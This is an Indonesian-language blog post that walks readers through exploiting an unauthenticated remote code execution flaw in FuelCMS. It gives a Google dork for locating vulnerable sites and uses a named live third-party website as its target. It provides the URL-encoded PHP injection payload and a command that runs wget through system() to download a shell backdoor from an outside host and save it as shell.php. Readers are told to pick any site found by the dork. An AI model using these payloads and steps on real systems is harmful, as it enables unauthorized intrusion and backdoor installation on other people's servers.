Ad Unit (Iklan) BIG

FuelCMS Unauthenticated Remote Code Execution (RCE)

Post a Comment

-

Hai sobat

Saya ikal,

Disini saya akan sharing sesuatu nih.

-


Sesuai judul kita kali ini, nih exploit dari tahun 2019an di publish di exploit-db.com, langsung saja.

Bahan : 

Google Dork :

inurl:/login/ intitle:Fuel CMS

- Shell Backdoor : 

http://www.wanoja.com/Awokwokwokwokwok.txt

- Exploit : 

/pages/select/?filter='%2bpi(print(%24a%3d'file_get_contents'))%2b%24a(phpinfo())%2b'


Langsung saja yah sob.

Kalian dorking dan pilih salah satu site untuk dijadikan target eksekusi yah. Salin dork diatas lalu pastekan di kolom searching browser kalian masing-masing.



Lanjut, jika sudah menentukan pasangan yang cocok, eh maksudnya sudah menentukan target, kalian bisa lanjut ketahap selanjutnya.

 

Disini saya sudah memiliki live target yah sob.

Live Target : http://www.argocycles.com/admin/



Nah tampilan dari target saya sendiri seperti itu yah, karena ini tidak perlu mendapatkan autentikasi, jadi langsung saja kita taruh exploitnya kedalam url target.

 

https://localhost/[path]//pages/select/?filter='%2bpi(print(%24a%3d'file_get_contents'))%2b%24a(phpinfo())%2b'

Contoh : 

http://www.argocycles.com/admin/pages/select/?filter=%27%2bpi(print(%24a%3d%27file_get_contents%27))%2b%24a(phpinfo())%2b%27 

 

*Nb : Exploit yang diatas hanya untuk memastikan bahwa target vuln atau tidak!

Lanjut jika vuln akan muncul phpinfo dari server target kalian. Sedikit penjelasan mengapa kita mengecek phpinfo terlebih dahulu, saya sarankan mengecek phpinfo dengan tujuan untuk mengecek DISABLE_FUNCTION pada target kalian masing-masing. karena banyak orang-orang yang hanya melakukan wget dan berharap shellnya terupload tanpa ada gangguan sedikitpun :D. Lo pikir hidup jalan sesuai kemaoan lo :D.


Dan sedikit penjelasan mengapa saya memakai command file_get_contents, itu dikarenakan command tersebut jarang sekali terlihat di DISABLE_FUNCTION. Okeh lanjut lagi kita, jika phpinfo muncul namun hanya sekejap saja, tenang itu bukan berarti tidak vuln. Kita lakukan view-source lalu Ctrl + F lalu ketikan disable_functions


dan banyak sekali perintah yang di disable oleh server target saya kali ini :D.


pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,dll

 

Itu hanya 1/4 perintah yang di disable oleh server :D. masih banyak lagi aslinya.... Namun perintah system shell_exec exec dan lainnya sepertinya tidak terkena disable. jadi kalian bebas melakukan apapun kepada server, bahkan mengupload shell backdoor.


upload shell command :

 

'%2bpi(print(%24a%3d'system'))%2b%24a('wget http://www.wanoja.com/Awokwokwokwokwok.txt -O shell.php')%2b'


Maka shell backdoor akan terupload di directory root dari server target kalian.

Sekian dari saya. Bila ada yang kurang atau salah kata biarkan saja.


Referensi : https://www.exploit-db.com/exploits/47138


Thanks

See U

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email